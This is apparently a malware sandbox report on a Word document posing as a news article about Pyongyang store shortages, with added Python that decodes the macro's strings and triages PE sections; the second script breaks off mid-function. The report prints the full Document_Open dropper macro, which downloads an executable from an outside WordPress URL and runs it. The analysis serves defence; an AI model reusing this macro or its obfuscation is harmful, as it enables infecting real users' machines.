VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Threat Names:
VBA:Amphitryon.1265
Gen:Variant.Graftor.596138
Gen:Variant.Zusy.308149
...

Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia.doc

Word Document

Created at 2020-12-23T15:02:00

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "11 minutes" to "1 minute, 50 seconds" to reveal dormant functionality.

Files
Filename  Category  Type  Severity
C:\Users\FD1HVy\Desktop\Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia.doc  Sample File  Word Document  Malicious
Mime Type application/msword
File Size 52.00 KB
MD5 90a59c16d670fd77d710516299533834
SHA1 25c0a651d7bdfdfca2f37160837829bea669c5f7
SHA256 70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665
SSDeep 384:Mo8AY64U4jOHgiI/6iSY5UFXoOfYxFSAtcwqVCM+V0hxtjiK6yOrX0jui3M:t/7dRc6lCMvxp6yOL5i
ImpHash -
Parser Error Remark: Static engine was unable to completely parse the analyzed file
Office Information
Creator SNOOPY
Last Modified By user
Revision 5
Create Time 2020-11-26 22:28:00+00:00
Modify Time 2020-11-26 22:37:00+00:00
Document Information
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 14.0
Template Normal.dotm
Company Microsoft
Document Security NONE
Editing Time 120.0
Page Count 3
Line Count 28
Paragraph Count 8
Word Count 599
Character Count 3417
Chars With Spaces 4008
scale_crop False
shared_doc False
_PID_HLINKS ['https://www.nknews.org/2020/08/kaesong-lockdown-lifted-at-north-korean-politburo-meeting-led-by-kim-jong-un/?t=1603769778434', 'https://www.nknews.org/2020/08/unicef-says-north-korea-decided-to-temporarily-close-nampho-port-late-july/?t=1604306607548', 'https://www.nknews.org/2020/10/north-korea-urges-people-indoors-fearing-dust-from-china-will-spread-covid-19/?t=1604306607548', 'https://www.nknews.org/pro/full-text-north-koreas-decree-to-shoot-people-illegally-approaching-border/?t=1603703245483', 'https://www.un.org/en/coronavirus/covid-19-faqs']
Controls (1)
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
VBA Macros (1)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
    ' Auto-executes when the document is opened with macros enabled.
    Dim euelis As Object
    Dim itelro As String

    ' Resolve %APPDATA%\Microsoft\Windows\Templates; the payload is dropped there.
    Set euelis = CreateObject("WScript.Shell")
    itelro = euelis.SpecialFolders("Templates")

    Dim bbb
    Dim ccc
    Dim ddd
    Dim eee
    Dim fff
    Dim ggg As Integer
    Dim hhh
    Dim iii
    ggg = 1

    ' Force the body text to black; lure documents often ship the decoy text in an
    ' unreadable colour until the macro runs.
    ActiveDocument.Range.Font.Color = wdColorBlack

    Set hhh = CreateObject("microsoft.xmlhttp")

    ' Every sensitive string is built one character at a time from Chr() of an
    ' integer expression (decimal and &H hex literals), so no ProgID, path or URL
    ' exists as a literal for static scanners to match.
    ' dfefef evaluates to "Shell.Application".
    Dim dfefef
    dfefef = Chr(88395 / &H429) + Chr(-6659 + &H1A6B) & Chr(-5652 + &H1679) & Chr(111348 / &H407) & Chr(-2738 + &HB1E) & Chr(136114 / &HB8F) & Chr(195715 / &HBC3) & Chr(1097488 / &H2647) & Chr(-2672 + &HAE0) & Chr(175932 / &H65D) & Chr(430710 / &H1006) & Chr(705672 / &H1BD8) & Chr(-6236 + &H18BD) & Chr(215876 / &H745) & Chr(84840 / &H328) & Chr(1005438 / &H2362) & Chr(863830 / &H1EAD)
    Set fff = CreateObject(dfefef)

    ' eee evaluates to <Templates folder> & "\spolsve.exe" (the dropped file listed below).
    eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))

    ' zzz and yyy evaluate to the two halves of the download URL; the path ends in
    ' /TEMP.so, which reappears as temp[1].so in the INetCache listing below.
    zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))

    yyy = Chr(214015 / CLng(&H745)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))

    ' Fetch the payload synchronously and write the raw response body to disk:
    ' adodb.stream Type 1 = adTypeBinary, SaveToFile option 2 = adSaveCreateOverWrite.
    hhh.Open "get", zzz + yyy, False
    hhh.send
    ccc = hhh.responseBody
    If hhh.Status = 200 Then
        Set bbb = CreateObject("adodb.stream")
        bbb.Open
        bbb.Type = ggg
        bbb.Write ccc
        bbb.SaveToFile eee, ggg + ggg
        bbb.Close
    End If

    ' Launch the dropped file through Shell.Application's Open method. The call sits
    ' outside the status check, so it is attempted even when the download failed.
    fff.Open (eee)
End Sub
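The macro hides every string it needs behind Chr() arithmetic. The Python below is an added example written for this report, not code from the sample or from VMRay: it pulls each Chr(...) argument off the four obfuscated assignments above (copied verbatim into MACRO_STRINGS), rewrites &H hex literals and CLng() into plain integer expressions, evaluates them with a restricted AST walker rather than eval(), and rounds to a character code the way VBA coerces a Double to Long before Chr(). Helper names such as decode_chr_string and payload_url are this example's own; the recovered strings are whatever the page's arithmetic yields.

```python
"""Decode the Chr()-arithmetic string obfuscation used in the Document_Open macro."""
import ast
import re

# One Chr(...) call; the inner group tolerates one level of nested parentheses
# such as CLng(&H1B90).
_CHR_CALL = re.compile(r"Chr\(((?:[^()]|\([^()]*\))*)\)")
_HEX_LITERAL = re.compile(r"&H([0-9A-Fa-f]+)")

# The four obfuscated assignments, copied verbatim from the macro above.
# eee is prefixed at runtime by the Templates folder (itelro); only the Chr() part is decoded here.
MACRO_STRINGS = {
    "dfefef": "Chr(88395 / &H429) + Chr(-6659 + &H1A6B) & Chr(-5652 + &H1679) & Chr(111348 / &H407) & Chr(-2738 + &HB1E) & Chr(136114 / &HB8F) & Chr(195715 / &HBC3) & Chr(1097488 / &H2647) & Chr(-2672 + &HAE0) & Chr(175932 / &H65D) & Chr(430710 / &H1006) & Chr(705672 / &H1BD8) & Chr(-6236 + &H18BD) & Chr(215876 / &H745) & Chr(84840 / &H328) & Chr(1005438 / &H2362) & Chr(863830 / &H1EAD)",
    "eee": "itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))",
    "zzz": "Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))",
    "yyy": "Chr(214015 / CLng(&H745)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))",
}


def _to_python_expr(vba_expr: str) -> str:
    """Translate a VBA integer expression: &Hxxxx -> decimal, CLng(x) -> (x)."""
    expr = _HEX_LITERAL.sub(lambda m: str(int(m.group(1), 16)), vba_expr)
    return expr.replace("CLng", "")  # CLng only widens to Long; the parentheses stay


def _safe_eval(expr: str) -> float:
    """Evaluate +, -, *, / over numeric literals only; never eval() attacker-controlled text."""
    ops = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
           ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}

    def walk(node: ast.AST) -> float:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported construct in obfuscated expression: {ast.dump(node)}")

    return walk(ast.parse(expr, mode="eval"))


def decode_chr_string(vba_line: str) -> str:
    """Concatenate the characters produced by every Chr() call on one VBA line."""
    chars = []
    for match in _CHR_CALL.finditer(vba_line):
        value = _safe_eval(_to_python_expr(match.group(1)))
        code = round(value)  # VBA coerces the Double result to Long before Chr()
        if abs(value - code) > 1e-9 or not 0 <= code <= 0xFFFF:
            raise ValueError(f"Chr({match.group(1)}) does not yield a character code")
        chars.append(chr(code))
    return "".join(chars)


def decode_macro(strings: dict[str, str] = MACRO_STRINGS) -> dict[str, str]:
    """Decode every obfuscated assignment, keyed by the macro's variable name."""
    return {name: decode_chr_string(line) for name, line in strings.items()}


def payload_url(decoded: dict[str, str]) -> str:
    """The macro requests zzz + yyy, so the URL is their concatenation."""
    return decoded["zzz"] + decoded["yyy"]


if __name__ == "__main__":
    decoded = decode_macro()
    for name, text in decoded.items():
        print(f"{name:7} = {text!r}")
    print("download URL =", payload_url(decoded))
```

Run stand-alone it prints Shell.Application for dfefef, \spolsve.exe for eee (the Templates folder prefix is resolved only at runtime, which is why the regex skips the itelro term) and, for zzz + yyy, https://www.rabadaun.com/wordpress/wp-content/themes/TEMP.so, consistent with the spolsve.exe and temp[1].so paths in the dropped-file listing further down. The AST walker accepts nothing but numeric literals and the four arithmetic operators, so a macro that smuggled a function call into a Chr() argument would raise rather than execute.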







Document Content Snippet
Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia. Amid an ongoing, full-scale border lockdown against COVID-19, North Korea on Tuesday warned its citizens against relying on imported foreign goods, calling the habit a dangerous disease that could spread the virus from abroad. Pyongyang's warning against bringing in foreign goods is not just empty words, either: On Monday, sources told VOA that supermarkets and shops in Pyongyang have lacked foreign-sourced staples for months, including coffee, cocoa and chocolate. This appears to be out of paranoia that foreign goods could carry traces of COVID-19, which is possible, according to the United Nations (https://www.un.org/en/coronavirus/covid-19-faqs), though not the most common way the virus has been transmitted worldwide. Sources also told VOA that there's currently no evidence that food items are coming across the border from China, with only locally produced items available on Pyongyang store shelves. INT ...
Local AV Matches (1)
Threat Name Severity
VBA:Amphitryon.1265
Malicious
YARA Matches (3)
Rule Name  Rule Description  Classification  Score
VBA_Execution_Commands  VBA macro may execute files or system commands  -  3/5
VBA_Create_File  VBA macro contains file creation commands; possible dropper  -  2/5
VBA_Download_Commands  VBA macro may attempt to download external content; possible dropper  -  2/5
c:\users\fd1hvy\appdata\local\temp\liebert.bmp  Dropped File  Binary  Malicious
Mime Type application/vnd.microsoft.portable-executable
File Size 67.00 KB
MD5 f108a4d064dd05c0a097f517ec738b1a
SHA1 f197a7be7fdb286bc9673a57b54994c02a7af8d6
SHA256 d1baefd0bdc7f3b0369c5b7126c3b98469a518cf4db788fad1d243d8661a17b9
SSDeep 1536:kW5DsMyKp7Pf+h++qpCMi91GPGfuFj6nniFIlkK1wdS1A:55DsklPf+h5qmhW56nief1wdS
ImpHash 6b098027ff46fe7329c1dbb6421e85dc
File Reputation Information
Severity
Blacklisted
Names Mal/Generic-S
PE Information
Image Base 0x400000
Entry Point 0x404656
Size Of Code 0xc400
Size Of Initialized Data 0x19a00
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2020-11-19 17:00:55+00:00
Sections (3)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0xc355 0xc400 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.58
.rdata 0x40e000 0x2ec8 0x3000 0xc800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.92
.data 0x411000 0x16920 0x1400 0xf800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.02
Imports (5)
KERNEL32.dll (82)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateFileA 0x0 0x40e008 0x106ec 0xeeec 0x88
CloseHandle 0x0 0x40e00c 0x106f0 0xeef0 0x52
GetFileAttributesA 0x0 0x40e010 0x106f4 0xeef4 0x1e5
CreateDirectoryA 0x0 0x40e014 0x106f8 0xeef8 0x7c
WriteFile 0x0 0x40e018 0x106fc 0xeefc 0x525
CreateProcessA 0x0 0x40e01c 0x10700 0xef00 0xa4
GetTempPathA 0x0 0x40e020 0x10704 0xef04 0x284
Sleep 0x0 0x40e024 0x10708 0xef08 0x4b2
GetVersionExA 0x0 0x40e028 0x1070c 0xef0c 0x2a3
GetProcAddress 0x0 0x40e02c 0x10710 0xef10 0x245
WaitForSingleObject 0x0 0x40e030 0x10714 0xef14 0x4f9
GetSystemInfo 0x0 0x40e034 0x10718 0xef18 0x273
GetComputerNameA 0x0 0x40e038 0x1071c 0xef1c 0x18c
GetVolumeInformationA 0x0 0x40e03c 0x10720 0xef20 0x2a5
LoadLibraryA 0x0 0x40e040 0x10724 0xef24 0x33c
FreeLibrary 0x0 0x40e044 0x10728 0xef28 0x162
GetSystemDirectoryA 0x0 0x40e048 0x1072c 0xef2c 0x26f
GetFileSize 0x0 0x40e04c 0x10730 0xef30 0x1f0
GetModuleHandleA 0x0 0x40e050 0x10734 0xef34 0x215
GetModuleFileNameA 0x0 0x40e054 0x10738 0xef38 0x213
CreateFileW 0x0 0x40e058 0x1073c 0xef3c 0x8f
GetProcessHeap 0x0 0x40e05c 0x10740 0xef40 0x24a
SetEndOfFile 0x0 0x40e060 0x10744 0xef44 0x453
GetStringTypeW 0x0 0x40e064 0x10748 0xef48 0x269
LCMapStringW 0x0 0x40e068 0x1074c 0xef4c 0x32d
HeapReAlloc 0x0 0x40e06c 0x10750 0xef50 0x2d2
HeapSize 0x0 0x40e070 0x10754 0xef54 0x2d4
WriteConsoleW 0x0 0x40e074 0x10758 0xef58 0x524
FlushFileBuffers 0x0 0x40e078 0x1075c 0xef5c 0x157
SetStdHandle 0x0 0x40e07c 0x10760 0xef60 0x487
SetFilePointer 0x0 0x40e080 0x10764 0xef64 0x466
IsValidCodePage 0x0 0x40e084 0x10768 0xef68 0x30a
GetOEMCP 0x0 0x40e088 0x1076c 0xef6c 0x237
GetCommandLineA 0x0 0x40e08c 0x10770 0xef70 0x186
HeapSetInformation 0x0 0x40e090 0x10774 0xef74 0x2d3
SetUnhandledExceptionFilter 0x0 0x40e094 0x10778 0xef78 0x4a5
GetModuleHandleW 0x0 0x40e098 0x1077c 0xef7c 0x218
ExitProcess 0x0 0x40e09c 0x10780 0xef80 0x119
DecodePointer 0x0 0x40e0a0 0x10784 0xef84 0xca
GetStdHandle 0x0 0x40e0a4 0x10788 0xef88 0x264
GetModuleFileNameW 0x0 0x40e0a8 0x1078c 0xef8c 0x214
FreeEnvironmentStringsW 0x0 0x40e0ac 0x10790 0xef90 0x161
WideCharToMultiByte 0x0 0x40e0b0 0x10794 0xef94 0x511
GetEnvironmentStringsW 0x0 0x40e0b4 0x10798 0xef98 0x1da
SetHandleCount 0x0 0x40e0b8 0x1079c 0xef9c 0x46f
InitializeCriticalSectionAndSpinCount 0x0 0x40e0bc 0x107a0 0xefa0 0x2e3
GetFileType 0x0 0x40e0c0 0x107a4 0xefa4 0x1f3
GetStartupInfoW 0x0 0x40e0c4 0x107a8 0xefa8 0x263
DeleteCriticalSection 0x0 0x40e0c8 0x107ac 0xefac 0xd1
EncodePointer 0x0 0x40e0cc 0x107b0 0xefb0 0xea
TlsAlloc 0x0 0x40e0d0 0x107b4 0xefb4 0x4c5
TlsGetValue 0x0 0x40e0d4 0x107b8 0xefb8 0x4c7
TlsSetValue 0x0 0x40e0d8 0x107bc 0xefbc 0x4c8
TlsFree 0x0 0x40e0dc 0x107c0 0xefc0 0x4c6
InterlockedIncrement 0x0 0x40e0e0 0x107c4 0xefc4 0x2ef
SetLastError 0x0 0x40e0e4 0x107c8 0xefc8 0x473
GetCurrentThreadId 0x0 0x40e0e8 0x107cc 0xefcc 0x1c5
GetLastError 0x0 0x40e0ec 0x107d0 0xefd0 0x202
InterlockedDecrement 0x0 0x40e0f0 0x107d4 0xefd4 0x2eb
HeapCreate 0x0 0x40e0f4 0x107d8 0xefd8 0x2cd
QueryPerformanceCounter 0x0 0x40e0f8 0x107dc 0xefdc 0x3a7
GetTickCount 0x0 0x40e0fc 0x107e0 0xefe0 0x293
GetCurrentProcessId 0x0 0x40e100 0x107e4 0xefe4 0x1c1
GetSystemTimeAsFileTime 0x0 0x40e104 0x107e8 0xefe8 0x279
TerminateProcess 0x0 0x40e108 0x107ec 0xefec 0x4c0
GetCurrentProcess 0x0 0x40e10c 0x107f0 0xeff0 0x1c0
UnhandledExceptionFilter 0x0 0x40e110 0x107f4 0xeff4 0x4d3
IsDebuggerPresent 0x0 0x40e114 0x107f8 0xeff8 0x300
IsProcessorFeaturePresent 0x0 0x40e118 0x107fc 0xeffc 0x304
EnterCriticalSection 0x0 0x40e11c 0x10800 0xf000 0xee
LeaveCriticalSection 0x0 0x40e120 0x10804 0xf004 0x339
RtlUnwind 0x0 0x40e124 0x10808 0xf008 0x418
MultiByteToWideChar 0x0 0x40e128 0x1080c 0xf00c 0x367
ReadFile 0x0 0x40e12c 0x10810 0xf010 0x3c0
HeapFree 0x0 0x40e130 0x10814 0xf014 0x2cf
GetConsoleCP 0x0 0x40e134 0x10818 0xf018 0x19a
GetConsoleMode 0x0 0x40e138 0x1081c 0xf01c 0x1ac
HeapAlloc 0x0 0x40e13c 0x10820 0xf020 0x2cb
RaiseException 0x0 0x40e140 0x10824 0xf024 0x3b1
LoadLibraryW 0x0 0x40e144 0x10828 0xf028 0x33f
GetCPInfo 0x0 0x40e148 0x1082c 0xf02c 0x172
GetACP 0x0 0x40e14c 0x10830 0xf030 0x168
USER32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetSystemMetrics 0x0 0x40e15c 0x10840 0xf040 0x17e
ADVAPI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetUserNameA 0x0 0x40e000 0x106e4 0xeee4 0x164
SHELL32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ShellExecuteExA 0x0 0x40e154 0x10838 0xf038 0x120
WS2_32.dll (11)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
recv 0x10 0x40e164 0x10848 0xf048 -
send 0x13 0x40e168 0x1084c 0xf04c -
connect 0x4 0x40e16c 0x10850 0xf050 -
closesocket 0x3 0x40e170 0x10854 0xf054 -
htons 0x9 0x40e174 0x10858 0xf058 -
socket 0x17 0x40e178 0x1085c 0xf05c -
WSAStartup 0x73 0x40e17c 0x10860 0xf060 -
WSACleanup 0x74 0x40e180 0x10864 0xf064 -
gethostbyname 0x34 0x40e184 0x10868 0xf068 -
inet_ntoa 0xc 0x40e188 0x1086c 0xf06c -
inet_addr 0xb 0x40e18c 0x10870 0xf070 -
Local AV Matches (1)
Threat Name Severity
Gen:Variant.Graftor.596138
Malicious
c:\programdata\a7963\tlworker.exe  Dropped File  Binary  Malicious
Also Known As C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\Templates\spolsve.exe (Dropped File)
c:\users\fd1hvy\appdata\roaming\microsoft\windows\templates\spolsve.exe (Dropped File)
c:\users\fd1hvy\appdata\local\microsoft\windows\inetcache\ie\5alfeguz\temp[1].so (Dropped File)
Mime Type application/vnd.microsoft.portable-executable
File Size 284.00 KB
MD5 f160c057fded2c01bfdb65bb7aa9dfcc
SHA1 1e14de870b1c4b09cbf81206562a254c27178d85
SHA256 efc139dc0e280a374065dc59c55a45b5146f091a85a3abd6f0caf1a9a2f8b060
SSDeep 6144:deSI8dD+Zp4IWoafJC8WVpH4dx98hNVVjr/:deSI8ha4ItNVVn
ImpHash 35d1e2dd9caee6ca5d2146aa4334cd09
File Reputation Information
Severity
Blacklisted
Names Mal/Generic-S
PE Information
Image Base 0x400000
Entry Point 0x409cb0
Size Of Code 0x21000
Size Of Initialized Data 0x25000
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2016-12-06 11:35:32+00:00
Sections (4)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2033b 0x21000 0x1000 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.53
.rdata 0x422000 0x10618 0x11000 0x22000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.9
.data 0x433000 0x63a8 0x3000 0x33000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.34
.pnuvq 0x43a000 0x10c8f 0x11000 0x36000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 7.9
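Two details in the dropped-file records above are worth an automated check: liebert.bmp carries a PE MIME type despite its image extension, and tlworker.exe has a non-standard .pnuvq section that is readable, writable and at 7.9 bits/byte of entropy, the usual profile of a packed or encrypted payload that is unpacked at runtime. The Python below is an added example, not VMRay's parser or code from either sample: it identifies a PE by its MZ and PE\0\0 signatures regardless of filename, walks the COFF section table, computes per-section Shannon entropy and flags sections by name, entropy and RWX characteristics. The SAMPLE_SPEC image is constructed inside the script to mirror that section layout; its bytes are synthetic and the function names are this example's own.

```python
"""Section-table triage for dropped PE files, keyed on magic bytes rather than extension."""
import math
import random
import struct
from typing import NamedTuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a mainstream linker emits; anything else deserves a look.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                        ".edata", ".bss", ".tls", ".pdata", ".CRT", ".textbss"}
HIGH_ENTROPY = 7.0  # bits/byte; compressed or encrypted content sits near 8.0


class Section(NamedTuple):
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_offset: int
    characteristics: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def is_pe(data: bytes) -> bool:
    """MZ stub plus a PE\\0\\0 signature at e_lfanew; the filename is irrelevant."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def parse_sections(data: bytes) -> list[Section]:
    """Walk the COFF section table and compute the entropy of each section's raw bytes."""
    if not is_pe(data):
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        (name, vsize, vaddr, rsize, roff,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        raw = data[roff:roff + rsize]
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"), vsize, vaddr,
                                rsize, roff, chars, shannon_entropy(raw)))
    return sections


def triage(sections: list[Section]) -> dict[str, list[str]]:
    """Return {section name: [reasons]} for sections that look packed or self-modifying."""
    findings: dict[str, list[str]] = {}
    for s in sections:
        reasons = []
        if s.name not in COMMON_SECTION_NAMES:
            reasons.append("non-standard name")
        if s.entropy >= HIGH_ENTROPY:
            reasons.append(f"high entropy ({s.entropy:.2f})")
        if s.characteristics & IMAGE_SCN_MEM_WRITE and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable and executable")
        if s.raw_size == 0 and s.virtual_size > 0:
            reasons.append("no raw data; filled at runtime")
        if reasons:
            findings[s.name] = reasons
    return findings


def build_sample_pe(spec) -> bytes:
    """Construct a minimal PE32 image from (name, characteristics, raw bytes) triples (test input only)."""
    n = len(spec)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)       # PE32 magic, rest zeroed
    raw_base = 0x40 + 4 + 20 + 0xE0 + 40 * n                  # first byte after the headers
    table, blobs = b"", b""
    for i, (name, chars, payload) in enumerate(spec):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(payload),
                             0x1000 * (i + 1), len(payload), raw_base + len(blobs),
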